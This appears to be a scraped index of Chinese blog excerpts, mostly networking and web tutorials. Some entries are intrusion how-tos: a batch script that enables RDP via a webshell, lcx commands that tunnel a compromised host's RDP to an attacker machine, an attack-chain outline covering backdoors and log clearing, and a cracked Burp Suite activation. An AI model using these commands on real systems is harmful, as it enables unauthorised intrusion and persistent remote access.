-
某宝卖的微信号解封教程
某宝买的教程解决办法: 微信被封永久禁和其它时长解决办法: 如果绑定了QQ号,可以去冻结账户,修改QQ密码24小时候申请解冻,会有意想不到的效果。 微信号被封禁60天的解决方法:如果绑定了QQ号,可以去冻结账户6~8小时再解冻,就变成了3天。 微信号被封30天的解决方法:先登录账号进入安全中心,下一步将账号解冻5小时后再解冻,登陆微信查看是否变成3天。 ...
-
m1款mbp读写ntfs硬盘
想要拷贝给一个同事的ntfs硬盘里文件,插到拓展坞上发现无法读写 找了一圈方法,发现相关的程序都不支持arm框架的cpu 还好最后找到了不用安装软件的方法 首先我们打开 启动台-其他-终端 然后我们输入下面的代码然后按回车运行 sudo nano /etc/fstab 这里要输一下电脑的密码(密码是不显示的),之后还是回车运行 然后就会进入一个文档页面 我们输入 LABEL=你的硬盘名字 none ntfs rw,auto,nobrowse 然后按 control + x 屏幕上提示你以后,按 y 确认来保存 这时候我们拔掉u盘再插上,发现访达里不显示这个u盘了 我们打开访达,点这个“前往文件夹” 输入以下内容并按回车 输入/Volumes/ 这时候就惊喜的看到刚才消失的u盘就出来啦!并且可以正常读写了 ...
-
百度蜘蛛爬取网站的频率低,怎么引导蜘蛛?
1、网站结构实现良好的树状结构;网站链接实现静态化;网站内容资源丰富。一定要先搭建好网站所需的架构,利于蜘蛛的爬行,蜘蛛不像人一样会思考,会转弯,所以需要指引。 2、保证网站更新频率。不要一天打鱼三天晒网,我们人喜欢新鲜的事物,蜘蛛也是一样的。就像小孩一样,每天给他糖吃,他自然就会跟着你,久而久之,他还会自动找上你呢。 3、保证有明确的关键词。百度蜘蛛就是通过关键词进来的,如果你网站没有明确的关键词的话,蜘蛛就会茫然了,那你网站的排名肯定会上不去。最好在标题里2-3个关键词,不要太多;而内页的关键词不要和标题的一样,这会更容易让蜘蛛把内页判断出来,并给于内页一定的权重。 4、保证网站高质量的原创。蜘蛛一天爬行那么多的地方,如果你的内容是采集来的,那对蜘蛛来说就没有什么意义了.不仅不能吸引蜘蛛的到来,也不能吸引用户的光临。蜘蛛的来访是有规律的。如果你每天有更新,它就每天来;一个月有更新,它就一个月来,所以说百度抓取取决于蜘蛛来访。 5、友情链接一定要做好,一个新站想要快速的站稳脚跟快速被收录,很大一部分是需要友情链接的,而且是优质的友情链接,找友情链接的标准一定要是按时更新内容、百度收录数量正常、站内友链不多、内容质量高、权重不低于自己的网站做友链,还要记住按时去检查友链。 6、定期将网站链接放到Sitemap中,然后将Sitemap提交给百度。百度会周期性的抓取检查您提交的Sitemap,对其中的链接进行处理,但收录速度慢于主动推送。 7、主动推送能够更快速的让百度发现你的网站并且收录,这也是最快速的提交方式,将站点当天新产出链接立即通过此方式推送给百度,以保证新链接可以及时被百度收录。 ...
-
如何无需插件给emlog文章插入视频
emlog自带的富文本编辑框是没有插入视频功能的,只有一个插入flash,在一些视频网站可能会有生成flash代码,直接插入链接就行了,但是怎么插入MP4呢?下面给大家带来教程。 一:文章编辑,点击倒数第二个按钮,html代码。 二:复制下面的代码,在合适的位置添加,样式自己看着调吧,然后再点击上面的按钮切回富文本编辑页面,就能看到效果了。 <video src="视频地址" controls="controls" width="100%"></video>...
-
听说一台主机只能保持最多65535个TCP连接,是真的吗?
答案是否定的。 如果计算机不受CPU、内存资源的硬件限制: 计算机为服务器(1),被动接受的连接数可以为232 * 216 * 216 = 264 (理论最大值) 计算机为客户端(2),主动发起的连接数可以为232 * 216 * 216 = 264(理论最大值) 上文的1、2的数字是怎么来的呢?让我们一起分析一下。 计算机为服务器的场景知乎服务器主机在103.41.167.234侦听443端口,等待着来自于任何IP地址的主机访问它,包括它自己。另外任何主机,可以使用任何端口来连接知乎的服务器,对吗? 全球有多少个IP地址呢?232一个主机对应一个IP地址,一个IP地址可以拥有多少个端口号?216两者相乘的结果,就是248 。 但是不要忘记知乎服务器还可以监听1、2、3 。。。444、445、446 。。。65535端口号,代表216服务,与248 相乘,正好得到264 。 计算机为客户端的场景其实和服务器没有任何区别。假设这个客户端的IP = 1.1.1.1,它可以使用特定的端口号10000来主动连接任何IP(232)服务器的任何端口(216),那么就可以建立264个连接。不要忘记客户端还可以使用非10000端口来连接以上服务器,客户端一共216端口,与264相乘,正好也得到264。 以上仅仅是理论,计算机的软硬件资源不可能无限使用。现实实现中操作系统对客户端的连接数有一个默认上限值,即65535。 客户端怎么限制的呢?默认情况下,一个端口号任何时间只能由一个TCP连接使用。客户端1.1.1.1 ,使用端口号10000与知乎服务器103.41.167.234的443端口连接。只要这个连接没有释放,端口号10000就不能用于其它任何连接。这意味着,客户端最大的端口数 = 最多TCP连接数。 潜规则可以使用PORT_REUSE来打破。只要连接TCP连接时,使用该选项,可以不受上文的限制。10000这个端口可以同时用于多个连接,而不仅仅局限于一个连接。 即使客户端有限制,服务器(一个IP)理论上依然可以维持248个连接数。但是那么庞大的连接数会让服务器慢地无法使用。为了让服务器能够给全球用户提供更优质的服务响应,可以使用服务器集群,负载均衡设备提供负载均衡,每个服务器维持几千个TCP连接数。 读者会发现,服务器负载得到了减轻,但是负载均衡设备本身却成为了新的瓶颈,因为用户流量都需要它来导流,如何解决这个问题? 域名解析可以将域名解析为多个负载均衡设备的IP,以此来提供负载均衡设备的负载均衡。...
-
反入侵体系建设入门-攻击场景梳理
0x00 信息收集 1.目标确认 1.1 域名注册信息 目标所有者信息 获取真实IP 验证是否存在CDN 绕过CDN查找网站真实IP 1.2 DNS信息查询 目的: 注册者名称及邮箱,再反查其他域名 手机号 座机号 ASN号 地址在线DNS信息查询工具 1.3 测试域传送漏洞 域传送是一种DNS事务,用于在主从服务器间复制DNS记录。虽然如今已经很少见主机会开启,但是还是应该确认一下。一旦存在域传送漏洞,就意味着你获取了整个域下面所有的记录。 1.4 业务相关 github泄露: 网盘泄露: 各种云网盘 敏感路径扫描: 2.OSINT 公开情报收集 2.1 社工技巧 查看注册的网站: 可以从这些方面判断用户是否注册过 知道QQ 知道手机号 留意社交动态 2.2 搜索引擎OSINT Google Hacking(baidu\bing\souhu\github) 2.3 浏览器实用插件: Wappalyzer:识别网站使用的中间件及其版本,再去漏洞库和搜索引擎找公开披露的漏洞 SwitchOmega:快捷切换代理 shodan:识别开放端口,主机服务等(被动信息搜集) hacktools:综合插件,很强大 firefox渗透便携版version48,工具集成很多 注意:根据获得服务、中间件信息、编辑器版本、数据库等OSINT去各大漏洞库、搜索引擎找漏洞利用 2.4 乌云和cnvd 乌云库\乌云镜像\GHDB\CNVD等公开漏洞库 0x01 主动探测 从管理员和用户的角度了解整个WEB应用乃至整个目标的全貌,主动探测会暴露ip以及留下日志信息,所以要... 1.主动扫描 1.1 常见服务漏洞 nmap的功能: 脚本扫描,隐蔽扫描,端口扫描,服务识别,OS识别,探测WAF 1.3 WAF及bypass 探测WAF bypass 1.4 目录、后台和敏感路径文件扫描 御剑目录、后台扫描 2.人工浏览\逐个请求burp 非常重要,有必要手动去浏览每个页面,点击页面上每一个跳转,这样在Burp的sitemap里面就可以出现这些请求和响应。 图片后台地址\图片后面的信息 跳转参数\奇怪的参数 泄露邮箱等社工信息 业务逻辑\架构 3.自动化 自动化渗透测试框架:(待补充) Sn1per Ary 0x02 漏洞挖掘 1.漏洞扫描工具 注意:登录类网站扫描要带cookies扫才能扫到 1.1 Nikto Web服务漏洞扫描器 1.2 AWVS漏扫 1.3 NESSUS 1.4 Xray自动化的漏洞挖掘 1.5 Fuzz 2.挖掘漏洞 2.1 SQL注入: 2.2 XSS: 2.3 文件上传 2.4 命令执行 2.5 弱口令及字典破解 后台弱口令爆破撞库 2.6 逻辑漏洞 0x03 漏洞利用 对应0x02的挖掘漏洞,进行对应的利用。 0x04 提升权限 提升权限不一定需要,根据任务目标决定。 1.1 内核漏洞 1.2 root权限运行的漏洞软件 1.3 弱密码/重用密码 1.4 suid配置错误 1.5 滥用sudo 1.6 Cronjobs 1.6 敏感文件 0x05 达成目标 1.1 重要文件窃取 1.2 数据库数据窃取、修改 0x06 权限维持 1.1 web后门 1.2 SSH后门 1.3 Cronjobs 1.4 SSH公钥 1.5 SUID=0用户 1.6 木马文件 0x07 防御对抗 1.1 日志清除 1.2 防护软件对抗(卸载) 1.3 进程注入 1.4 进程隐藏 0x08 横向移动 1.1 信息收集 1.2 隧道搭建 1.3 内网扫描 1.4 漏洞扫描 返回到主动探测的步骤,再来一遍。 写在结尾 很多攻击手法不能一一列举,之后会单独分模块展开叙述,如有技术问题交流,可以加入交流群。 ...
-
SQL 语句中 where 条件后 写上 1=1 是什么意思!
程序员在编程过程中,经常会在代码中使用到“where 1=1”,这是为什么呢? 这段代码应该是由程序(例如Java)中生成的,where条件中 1=1 之后的条件是通过 if 块动态变化的。 例如 String sql="select * from table_name where 1=1"; if( conditon 1) { sql=sql+" and var2=value2"; } if(conditon 2) { sql=sql+" and var3=value3"; } where 1=1 是为了避免where 关键字后面的第一个词直接就是 “and”而导致语法错误。 动态SQL中连接AND条件 where 1=1 是为了避免where 关键字后面的第一个词直接就是 “and”而导致语法错误。 where后面总要有语句,加上了1=1后就可以保证语法不会出错! select * from table where 1=1 因为table中根本就没有名称为1的字段,所以该SQL等效于select * from table, 这个SQL语句很明显是全表扫描,需要大量的IO操作,数据量越大越慢, 建议查询时增加必输项,即where 1=1后面追加一些常用的必选条件,并且将这些必选条件建立适当的索引,效率会大大提高 拷贝表 create table table_name as select * from Source_table where 1=1; 复制表结构 create table table_name as select * from Source_table where 1 <> 1; 所以在查询时,where1=1的后面需要增加其它条件,并且给这些条件建立适当的索引,效率就会大大提高。...
-
常见端口漏洞利用总结
...
-
某公司网络地址是202.117.240.0,被划分成16个子网,每个子网的子网掩码是多少?
现在来讨论这个小问题,202.117.240.0这个是一个地址段,不是一个IP地址。 202.117.240.0网络的掩码是多少? 网络掩码能是255.255.255.255?如果是一个IP地址,那么应该写成 202.117.240.0/32,表示IP= 202.117.240.0属于网段202.117.240.0,这个网段只有一个IP地址,即202.117.240.0。 很显然,一个IP地址,无法平均分成16个子网。一个网段地址至少要包含16个地址,才有可能被16除,那么满足这个条件的网段要至少包含16个IP地址。 通过这篇文章的介绍知道以下信息: 202.117.240.0/32 这个网段有1个IP地址;202.117.240.0/31 这个网段有2个IP地址;202.117.240.0/30 这个网段有4个IP地址;202.117.240.0/29 这个网段有8个IP地址;202.117.240.0/28 这个网段有16个IP地址; 202.117.240.0/28黄色加亮的满足划分子网的能力,因为它包含16个IP地址,平均分成16个子网,每个子网包含一个IP地址,这16个IP地址的样子应该是这样的: 202.117.240.0/32202.117.240.1/32202.117.240.2/32202.117.240.3/32202.117.240.4/32。。。 202.117.240.13/32202.117.240.14/32202.117.240.15/32 一共16个IP地址。 继续玩上面的游戏,将网络掩码从28减小为27。202.117.240.0/27 这个网段有32个IP地址。32也可以被16整除,没有余数。 202.117.240.0/27一共32个地址,平均分成16份,每份的个数=2,用网络掩码来表示:202.117.240.0/31202.117.240.2/31202.117.240.4/31。。。202.117.240.28/31202.117.240.30/31 继续上面的游戏,将网络掩码从27减小为26。 202.117.240.0/26 这个网段有64个IP地址。64也可以被16整除,商=4,余数=0。 202.117.240.0/30202.117.240.4/30。。。202.117.240.56/30202.117.240.60/30 继续上面的游戏,将网络掩码从26减小为25。 202.117.240.0/25 这个网段有128个IP地址。128也可以被16整除,商=8,余数=0。 202.117.240.0/25被切割成16个子网,分别如下: 202.117.240.0/29202.117.240.8/29 。。。202.117.240.112/29202.117.240.120/29 继续上面的游戏,将网络掩码从25减小为24。 202.117.240.0/24 这个网段有256个IP地址。256也可以被16整除,商=16,余数=0。 202.117.240.0/24被切割成16个子网,分别如下: 202.117.240.0/28202.117.240.16/28202.117.240.32/28202.117.240.48/28202.117.240.64/28202.117.240.80/28202.117.240.96/28。。。202.117.240.208/28202.117.240.224/28202.117.240.240/28 还能继续玩吗?不能再玩了,因为再玩就把别人家的IP地址,分给了自己的孩子。让咱们试一试。 网络掩码从24减小为23。 202.117.240.0/23 这个网段有512个IP地址。512也可以被16整除,商=32,余数=0。 202.117.240.0/23被切割成16个子网,分别如下: 202.117.240.0/27 (自家的IP地址)202.117.240.32/27 (自家的IP地址)202.117.240.64/27 (自家的IP地址)202.117.240.96/27 (自家的IP地址)202.117.240.128/27 (自家的IP地址)。。。202.117.240.224/27 (自家的IP地址)202.117.241.0/27 (灰色部分,从这里开始都是别人家的IP地址)202.117.241.32/27。。。202.117.241.192/27202.117.241.224/27 所以,将202.117.240.0平均分成16个子网,202.117.240.0默认使用/24掩码,每个子网的掩码= “/28”。在没有约束网络掩码= /24的前提下,使用/28、/27、/26、/25也是可以的。使用/28表示该公司只拥有16个IP地址,使用/24表示该公司拥有256个IP地址。...
-
WebShell -- 开启3389服务
一、查询远程连接的端口 1、命令查询,win7/win10/win2003都可以使用 REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber 0xd3d转换十进制是3389 2、注册表查询 二、开启3389端口的方法 1、工具开启 2、批处理开启,将下面代码复制到bat文件,双击自行开启远程连接 echo Windows Registry Editor Version 5.00>>3389.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.regecho "fDenyTSConnections"=dword:00000000>>3389.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.regecho "PortNumber"=dword:00000d3d>>3389.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.regecho "PortNumber"=dword:00000d3d>>3389.regregedit /s 3389.regdel 3389.reg 三、当3389端口被修改后,如何查找 1、通过大马的读注册表、找到3389端口,然后读取 2、通过大马的cmd命令 tasklist /svc,获取termservice的pid号 再执行netstat -ano查找2684对应的的端口就是远程连接端口 3、通过工具扫描 工具下载方式:加入交流群 注意:软件均来自网络,不能保证安全性 ...
-
WebShell -- 外网远程连接内网
一、环境: 1、内网主机IP:192.168.1.106 win2003 2、假设外网主机ip:192.168.1.104 win7 二、通过大马上传lcx.exe到服务器内网 1、将内网3389端口转发到外网2222端口 lcx.exe -slave 192.168.1.104 2222 127.0.0.1 3389 2、在攻击机win7监听2222本地端口,转发到4444端口 lcx.exe -listen 2222 4444 3、在攻击机win7中远程连接 三、利用工具转发reDuh 1、将软件自带的脚本拷贝到服务器中,根据不同环境,选择不同脚本 2、打开reDuh,将脚本文件上传的路径填写到URL,点击start,再点击create 3、打开远程连接,这个有点缓慢,但是可以连接成功的,详细见交流群视频教程 工具下载方式:加入交流群 ...
-
webshell后门分析
一、访问上传的木马文件 http://192.168.1.104/1.asp 二、点击F12,打开谷歌自带的开发人员工具,点击network 三、输入密码,看看抓包情况,该木马会自动向某网站上传木马路径和密码 四、查看木马源文件,然后搜索该网址,随便修改为一个无效地址,该木马用的是反转加密,所以我们搜索不到,有时候是其他加密,需要解密才可以修改 注意:抓包的时候,有的后门不是一登录就发送的,也有可能停一段时间才发送,甚至当你退出的时候才发送 ...
-
Burpsuite系列 -- burp2021.03安装使用
声明:该软件来源网络,仅供学习交流 一、下载地址:加入交流群 二、解压后,双击打开BurpSuite点击 三、打开BurpSuiteLoader,将license信息复制到过去,点击next 四、选择manual activation 五、copy request到activation request,再将activation response复制过去,点击next 六、点击完成,一路下一步 ...
-
为何Ping不通电脑的公网IP?
为什么我知道了自己pc的公网ip,还是ping不通呢?通过这个网站获得的ip www.ip138.com,并不能ping通。然后我在pc开了一个udp客户端进程,远程服务器也开了一个udp服务端进程,客户端发包给远程,可以收到回应,远程显示请求的ip也是对的。然后我在远程服务器开了一个客户端进程发包给我pc的ip,依旧没有反应。这是为什么呢。我电脑能看百度的网页说明我电脑的ip是有效的,百度也是可以响应。为什么反过来就请求它就卡住了? 为何Ping不通自己的公网IP?默认读者有NAT的基础知识。如果没有,可以在博客里找NAT章节阅读。 ISP对于出网(outbound)流量,需要在ISP网关上用自己的外网接口(Internet facing interface)的IP地址来替换IP报文的源IP地址,并将创建的替换关系以NAT表的方式下压到硬件FIB表里。当Ping报文的回复报文返回时,在硬件芯片匹配到刚刚生成的FIB表,所以返程流量可以进来,并最终到达你的电脑,那么你就可以Ping通。 为何Ping不通呢?网关禁止Ping,其实就是一个Inbound方向的ACL Deny过滤列表,这个ACL列表比FIB表更先看到Ping的回复报文。由于拒绝操作,报文被丢弃,所以无法Ping通。 为何可以访问远程UDP服务器,而远程服务器作为客户端却无法访问我电脑上的服务器? NAT网关,默认允许由内网(inside)主动发起的流量,而拒绝由外网(outside)主动发起的流量。 什么是内网(inside)主动发起的流量?你用电脑(inside)访问远程(outside)服务器,流量是内网的电脑触发的。 什么是外网(outside)主动发起的流量?远程服务器作为客户端(outside)访问你的电脑(inside)服务器,流量是外网的电脑触发的。 其实已经回答了你的第二个问题。当允许内网(inside)主动发起的流量,潜台词是,同时还允许返程流量。 远程服务器如何才能访问你的电脑呢?需要你的电脑在NAT网关上主动创建一个FIB表,一个FIB表条目其实就是一个小门,这个小门只允许曾经从这个小门出去的人,才能进来。如果不是从这个小门出去的人,对不起,无法进入。 这个小门其实就是一张转换表,假设你的电脑IP =192.168.1.2 , 使用2222端口访问服务器IP= 3.3.3.3 ,端口3333。 NAT网关生成的NAT表(192.168.1.2/2222, 3.3.3.3/3333)---(1.1.1.1/56789,3.3.3.3/3333)。 服务器看到的IP报文来自于1.1.1.1/56789。 NAT网关上小门的口令就是(1.1.1.1/56789,3.3.3.3/3333)。 服务器只要使用(3.3.3.3/3333)做为源IP/端口号,使用(1.1.1.1/56789)做为目的IP/端口号的IP报文,就可以从小门进入。 为了让小门永远敞开,需要双方用keep alive周期性刷新,否则小门会在没有流量刷新的情况下而超时删除,那么远程服务器的流量再也无法进入。只有让客户端主动发起流量,再创建一个小门才可以。...
-
路由器能隔离广播,要VLAN有什么用?
在上文用VLAN这把砍刀将一个超级大广播域,切割成N个小广播域,每一个小广播域用一个VLAN代表。每一个交换机的端口分配一个VLAN,拥有相同的VLAN的端口属于同一个VLAN,同一个广播域。 一个交换机有48端口,被平均分成3个VLAN,分别为VLAN 10、20、30,每个VLAN 有16个端口。当一个广播报文从任意一个端口接收到,只扩散到其中的15个端口。 问题来了,交换机与交换机之间的互联端口如果只有一个,分配什么VLAN比较合适呢? 10、20还是30? 都不合适。如果分配10,那么VLAN 20、30的广播报文就无法从互联端口流走。 有同学可能会说,交换机之间使用3个互联端口,分别分配10、20、30,可以完美解决问题。 但是这样会浪费端口资源。如果有100个VLAN的流量需要从交换机之间互联端口穿梭,则需要100个端口,每一个端口属于一个VLAN。而交换机只有48个端口啊,剩下的52个端口从哪里来? 以上的做法很不现实。解决这个问题很简单,只要让交换机之间的互联端口属于每一个VLAN,属于每一个广播域。交换机之间这种互联端口类型叫Trunk,属于任何广播域。 当广播报文需要进入交换机之间的互联端口,必须明确告知接收方交换机,该广播报文属于哪个广播域,哪个VLAN,那发送交换机是怎么做的呢? 很简单。只要在广播报文里嵌入一个VLAN标签,规范这项技术的标准是IEEE 802.1Q。 接收交换机只要从广播报文里将VLAN标签提取出来,然后将广播报文扩散到属于该VLAN的所有端口,包括Trunk口。上文说了,Trunk口默认属于所有广播域。 通过以上方式,一个广播报文唰地一下就扩散到所有属于该广播域(VLAN)的所有端口。而不属于该广播域(VLAN)的端口不会受到该条广播报文的骚扰,因为它们永远听不到这条广播。广播报文的隔离就是这样来实现的。 当然,任何时候都有特殊情况的发生。有些广播报文是交换机自身产生的,那么这个广播报文属于哪个广播域(VLAN)呢? 如果是ARP广播报文,通常是交换机的三层接口触发的,而三层接口会绑定二层接口。交换机根据二层接口属于哪个VLAN,以此来推断ARP广播报文属于哪个VLAN。然后打上VLAN标签,在该VLAN广播域里进行扩散。 如果是Cisco PVST+消息,每一个消息自己会携带自己的VLAN ID。 如果是RSTP消息呢,消息没有明确告知交换机VLAN值。交换机呢,也不着急,什么VLAN标签也不打,让消息在trunk里自由扩散。接收交换机收到之后也不着急,而是将任何没有携带VLAN标签的报文,默认认为是Native VLAN广播域的报文,并在Native VLAN广播域进行扩散。由于Native VLAN默认值 =1,而VLAN1一般不会分配给终端用户。所有终端用户永远也收不到类似的广播报文。 VLAN隔离广播报文讲的差不多了,继续讲报文开头的故事。 一台开机的电脑,发出DHCP广播报文,被交换机扩散到属于该VLAN(10)的广播域。DHCP大神也在VLAN10里,自然听到了。大神给电脑分配了一个IP地址、网络掩码、网关、DNS服务器,分别如下: IP = 10.1.1.2 Mask = 255.255.255.0 Gateway = 10.1.1.1 DNS = 10.1.1.1 并将消息以单播的方式发给这台电脑。同学们这里会有点疑惑,电脑在获得IP地址之前,还没有IP地址,大神怎么将消息单播给这台电脑呢? 此时电脑虽然没有IP地址,默认使用0.0.0.0这个地址,这个地址是无意义的,大神也知道是无意义的,大神并不care。但是电脑有自己的MAC地址啊,大神发出的单播报文只要填写目的MAC = 这台电脑的MAC,是不是就可以将消息单播给这台电脑了? 是的。 坐在电脑后的老王登场了,想Ping 10.1.2.2这台电脑玩玩,敲完命令回车,老王盯着屏幕看,以下是屏幕背后发生的故事。 电脑发现10.1.2.2和自己10.1.1.2并不在一个广播域。有同学可能会问,电脑知道怎么这两个IP地址不在一个广播域的? 电脑想笑但是忍住了,一个广播域内每台电脑的网段必须相同,否则就不是一个广播域。显然 10.1.2.2的网段 = 10.1.2,10.1.1.2的网段= 10.1.1,两个网段号明显不相同。 既然不在一个广播域,老王的电脑10.1.1.2能ARP广播发现10.1.2.2的MAC地址吗? 不能啊,不同的广播域有VLAN隔离着呢! 不在一个广播域,ARP广播也会被VLAN隔离,不会到达对方(10.1.2.2)的广播域,你觉得老王的电脑会发ARP广播请求对方的MAC地址吗? 不会的,电脑没那么傻! 无法发现对方的MAC地址,就无法完成二层以太协议头的封装,那么不同广播域的电脑就无法通信,囚徒困境? 并不是。 每个广播域都有一个特殊的角色,它的名字叫网关。网关可以代理转发不同广播域电脑之间的通信。比如上文中的网关=10.1.1.1就是这个特殊的角色。 老王电脑一旦发现对方和自己不在一个广播域,就会知道需要将Ping报文发给网关。 虽然知道网关的IP = 10.1.1.1,但光知道这个还不行,还需要ARP广播获得网关的MAC地址才能把Ping报文扔给网关。 由于网关IP = 10.1.1.1 和老王的电脑IP = 10.1.1.2,属于同一个网段,同一个广播域,那么ARP广播自然可以到达网关,那么就可以获得网关的MAC地址。 老王电脑将Ping报文扔给网关,网关收到这个目的IP = 10.1.2.2 的Ping报文怎么处理呢? 电脑 收到目的IP = 自己的IP,会将报文扔给CPU处理。 收到目的IP≠自己IP的报文会直接扔掉,气量太小,所以做不了网关。 网关 收到目的IP = 自己的IP,也会将报文扔给CPU处理。这是网关的主机(End System)一面,和普通电脑没有任何区别。 网关如果收到目的IP≠自己IP,会查询路由表做流量转发,这是网关的路由器(Intermediate System )的另一面,这就是路由器区别于普通电脑的一面。 网关发现自己另外一个接口IP = 10.1.2.1/24 与Ping报文的目的IP =10.1.2.2在一个相同的广播域,于是认为目标主机应该就在这个广播域。于是发出ARP广播请求对方的MAC地址。一旦获得MAC地址,就可以将Ping报文扔给这台10.1.2.2电脑。 总结一下 路由器 作为每一个广播域的优秀代表,不光可以为自己服务,而且可以为广播域其它电脑服务。 路由器尽管气量很大,但是只服务单播报文。遇到广播报文只会扔给CPU,不会转发。 一个广播域的接口,使用不同的网段。如果试图使用相同的网段、或者部分重叠的网段,路由器会拒绝使用。 交换机 使用VLAN来隔离广播域,一个VLAN一个广播域。 ...
-
路由器能隔离广播,要VLAN有什么用?
路由器能隔绝广播,那要VLAN有什么用?既配置了VLAN又划分在不同的网段是不是有些多余了? 透彻理解每一个字的真正涵义,有时并不那么容易。以下文字为了尝试让同学们透彻理解这些字的真正涵义。 什么是广播(Broadcast)? 广播报文,就是任何主机无条件接收的报文。无条件这三个字就不多解释了,可以理解为必须、强制的。 广播报文,如果没有IP协议头,只有Ethernet协议头,那么就是二层广播,二层广播地址 = FF:FF: FF:FF: FF:FF。 如果有IP协议头,那么就是三层广播,三层广播地址 = 255.255.255.255。 既然有广播,就会有单播(Unicast)。 什么是单播(Unicast)?如果高音喇叭是广播,管你愿不愿意听,你一定能听到。单播就是你和朋友在打电话,两者参与的点对点通信。 为何要有广播?广播报文都用在什么地方? 电脑开机的时候,需要一个IP地址与外部的世界通信。哪位大神能做点慈善事业,给这台电脑分配一个IP地址啊?这位做慈善事业的大神名字叫:DHCP服务器。 电脑并不知道有没有大神,也不知道大神的IP地址。如果知道大神的IP地址,就可以与大神单播通信了,对吗? 电脑并不care这些。每台电脑开机的时候都会使用广播来碰碰运气,于是发出了一个DHCP广播报文。 DHCP广播报文从网口流出去了,流到哪里去了? 交换机。 交换机怎么来处理这个广播报文? 交换机检查DHCP广播报文的目的MAC= FF:FF: FF:FF: FF:FF,知道这是一个广播报文。然后怎么处理? 需要将这个DHCP广播报文,发给这个广播域中的每一个端口。因为广播的涵义是每一个端口连接的电脑都需要接收,交换机这么做很好理解吧? 什么又是广播域呢?广播域,就是一个广播报文可以扩散的势力范围。比如,高音喇叭(广播),它的扩散范围就是一个广播域。默认情况下,交换机所有端口处于一个广播域。假设交换机有48个端口,那么这48个端口都处于同一个广播域。 交换机会将DHCP广播报文复制(copy)47次,将报文依次从47个端口流出(outgoing)。不是48个端口吗?怎么只从47个端口流出?其中有一个进口(incoming),即交换机接收到DHCP广播报文那个端口,需要剔除出去。 不要忘记,一个大型的网络可能有成百上千台交换机,上文中的47个端口通常会有1-2个端口连接其它交换机。那么DHCP广播报文就顺利地流到了其它交换机,然后继续扩散到所有端口。而其它的交换机还会连接着另外的交换机,就这么循环下去。假设网络里有100台交换机,一共48 * 100 = 4800个端口,那么4799个端口都会收到DHCP广播报文。 如果每个端口都连着电脑,那么4799个DHCP广播报文,就会产生4799次网卡的硬件中断,中断CPU的正在处理的工作,来处理这个DHCP广播报文。对于99.9%的电脑来说,完全是一种地地道道的骚扰,因为它们压根不是DHCP服务器大神,中断CPU难道很好玩吗? 不就是4799次广播报文吗?计算机CPU高速计算能力处理起来还不是小菜一碟? 如果4800台电脑都发一次DHCP广播报文呢?那么就是4800 *4800 = 23,035,200 。 如果是48000台电脑,每台主机一天发100个报文呢? 48000 * 48000 * 100 = 230400000000 次报文复制/天。 广播报文不光骚扰电脑的CPU,还消耗交换机硬件吞吐能力。你以为交换机的复制报文行为是很轻松的事吗? 其实并不是,复制报文的操作一样会消耗硬件资源,一样会消耗内部数据总线资源。 站着说话轻松,是因为我们并不知道交换机背后所付出的努力。而为了保护交换机被广播报文的骚扰,以及保护那些电脑的CPU的免受广播的骚扰,必须将广播域的势力范围大大缩小。用哪把砍刀将广播域的势力范围砍小呢? 砍刀的名字叫VLAN! VLAN 不同的电脑属于不同的业务部门,相同的业务部门使用同一个VLAN,一个VLAN就是上文的一个广播域。 只要将交换机端口分配到不同的VLAN里,就可以实现将交换机端口划分到不同的广播域。这句话如果看不懂,实在抱歉,真的帮不上你了。 接下来就简单了,对于入口(incoming)的广播报文,需要转发到哪些出口(outgoing)呢? 那么就根据入口(incoming port)属于哪个VLAN,然后把属于该VLAN的所有端口过滤出来,广播报文只转发到这些过滤出来的端口(入接口除外),因为它们属于一个广播域。而不要将广播报文发到所有的端口。...
-
为何主机的IP地址和网关一样还能上网?
为什么IP地址和网关一样还能上网,这样默认路由不就是自己了吗? 电信的网,固定IP,给了一个公网地址,IP地址(中间隐藏了):60.*.*.239,掩码:255.255.255.0,网关:60.*.*.239,网关的地址和IP是一样的,这样的话默认路由的下一跳不就是自己了吗,但是可以上网,百度搜索IP显示的地址也和电信给的一样60.*.*.239。 这里的网关,可以是任何IP地址,如果你喜欢,可以换成6.6.6.6或8.8.8.8等幸运数字也是可以上网的。 为什么呢?这里使用了PPPoE拨号技术,在这台网络设备与电信NAS网关之间动态创建了一条P2P(Point to Point)的隧道。隧道的本地虚拟接口假设为VA1,所有非60.x.x.0/24网段的流量都会通过VA1接口流出本地。 为何要从VA1流出本地?因为系统创建一条默认路由,类似于: 0.0.0.0/0 ------------ > VA1 VA1其实类似与ethernet接口。当我们使用ethernet接口来上网时,IP报文需要通过ethernet接口流出时,ethernet接口必须做的一件事是封装(Encapsulation): Ethernet+ IP报文 有读者说,封装之前,至少还需要目的MAC地址,不是吗?是的,需要ARP广播来发现网关的MAC地址,然后“Ethernet + IP报文“就可以流出网口了,对吗? Okay,当用户的IP报文需要从VA1接口流出时,VA1接口必须做的一件事也是封装: PPPoE + IP报文 然后呢,这个“PPPoE + IP报文“能长出翅膀飞走? 不能。 既然不能,那么这个报文最终还是要乖乖地从ethernet接口(网口)这个物理接口流出。既然要从ethernet接口流出,一定要遵守ethernet接口的潜规则,必须完成封装: Ethernet + PPPoE + IP报文 这里ethernet封装也需要目的MAC地址,对吗? 是的。 是否也需要使用ARP广播来发现NAS网关的MAC地址? 不需要。 为什么? 因为PPPoE握手协商阶段,已经通过Discovery、Offer等报文提前获得了PPPoE服务器(NAS网关)的MAC地址。既然知道了,就没有必要ARP广播了。 于是就发生了神奇的一幕,报文最终通过ethernet接口流出,但是竟然没有使用ARP广播。 当报文顺着ISP的接入网络一路流到NAS网关时,NAS网关干两件事: 剥离Ethernet封装,因为目的MAC地址是自己的,否则直接丢弃 剥离PPPoE封装,根据剩下的IP裸报文继续路由转发 网关的地方既然任何IP地址都可以,那能否是空白的? 应该不可以,如果空白,将不会有上文那条默认路由。 最后一点,NAS网关的下行方向的路由是什么样子的? 60.x.x.239/32 ------------ > VAn 这里的网络掩码为何是32,而不是24? 欢迎加入交流群一起讨论!...
-
windows密码获取 -- mimikatz
